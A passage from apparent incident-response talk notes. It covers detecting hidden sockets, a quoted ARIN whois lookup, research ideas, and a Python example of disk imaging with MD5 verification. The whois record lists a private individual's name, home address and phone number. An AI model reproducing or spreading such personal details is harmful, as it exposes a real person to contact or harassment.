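On a live box the kernel side comes from reading /proc/net/tcp directly (or from a trusted netstat on removable media) and the tool side from the installed netstat; any difference is a hidden socket.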
Domain Records...
% jwhois NETBLK-NNA-216-149-211-0
[whois.arin.net]
Falcon Networks (NETBLK-NNA-216-149-211-0)
   110 Meadowlands Parkway
   Secaucus, NJ 07094
   US

   Netname: NNA-216-149-211-0
   Netblock: 216.149.211.0 - 216.149.211.31

   Coordinator:
      Dept, Colo (CD242-ARIN) [email protected]
      201-902-9300

   Record last updated on 15-Jan-2000.
   Database last updated on 15-Mar-2001 22:41:13 EDT.

Organization: Alexander Voll
   Alexander Voll
   37 Overlook Terrace, Apt 6F
   New York, NY 10033
   US
   Phone: 212-781-1365
   Email: [email protected]
Further Research
- Identify best timeline format
- Identify best organization
- Identify best techniques
- Show use of new tools (e.g., TCTUTILS)
- Develop new tools (dd w/md5 checksumming, automated disc imaging & CD-R/DVD-R archiving)
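The "dd with md5 checksumming" item above, and the dd/md5sum steps of the getting-bits-off slides, as an added Python example that is not a tool from the talk: copy the source in fixed-size blocks, hash the bytes as they pass so the digest covers exactly what was written, fsync the image, record an md5sum-compatible sidecar, and re-read the image to verify it. demo() uses a constructed file in place of a partition device; on a real box the source would be something like /dev/hda1 and the destination a file on the mounted removable medium.

```python
import hashlib
import os
import tempfile

def image_with_hash(src, dest, bs=1024):
    """Copy src to dest in bs-byte blocks, hashing the bytes in flight.

    Returns (bytes_copied, md5_hex). Because the digest is taken from the
    same stream that is written, it is recorded at acquisition time rather
    than in a second pass over a medium that may have changed by then.
    """
    h = hashlib.md5()
    copied = 0
    with open(src, "rb") as fin, open(dest, "wb") as fout:
        while True:
            block = fin.read(bs)
            if not block:
                break
            h.update(block)
            fout.write(block)
            copied += len(block)
        fout.flush()
        os.fsync(fout.fileno())          # make sure the bytes reached the medium
    digest = h.hexdigest()
    with open(dest + ".md5", "w") as f:  # sidecar in 'md5sum -c' format
        f.write("%s  %s\n" % (digest, os.path.basename(dest)))
    return copied, digest

def verify_image(dest, expected_md5, bs=1024):
    """Re-read the written image and compare its digest with the recorded one."""
    h = hashlib.md5()
    with open(dest, "rb") as f:
        for block in iter(lambda: f.read(bs), b""):
            h.update(block)
    return h.hexdigest() == expected_md5

def demo():
    """Constructed stand-in for a partition: a small file instead of /dev/hda1."""
    root = tempfile.mkdtemp()
    src = os.path.join(root, "hda1")
    with open(src, "wb") as f:
        f.write(b"constructed partition contents\n" * 100)
    dest = os.path.join(root, "hda1.dd")
    copied, digest = image_with_hash(src, dest)
    return copied, digest, verify_image(dest, digest)

if __name__ == "__main__":
    copied, digest, ok = demo()
    print(copied, digest, "verified" if ok else "MISMATCH")
```

The same in-flight hashing applies to the network path on the earlier slide: hash the stream on the sending side before it enters nc and again on the file the receiver wrote, and the two digests must agree. A read error on a failing disk is the one case this does not cover; dd's conv=noerror,sync pads the unreadable block, and the recorded digest then describes the padded image, which should be noted alongside it.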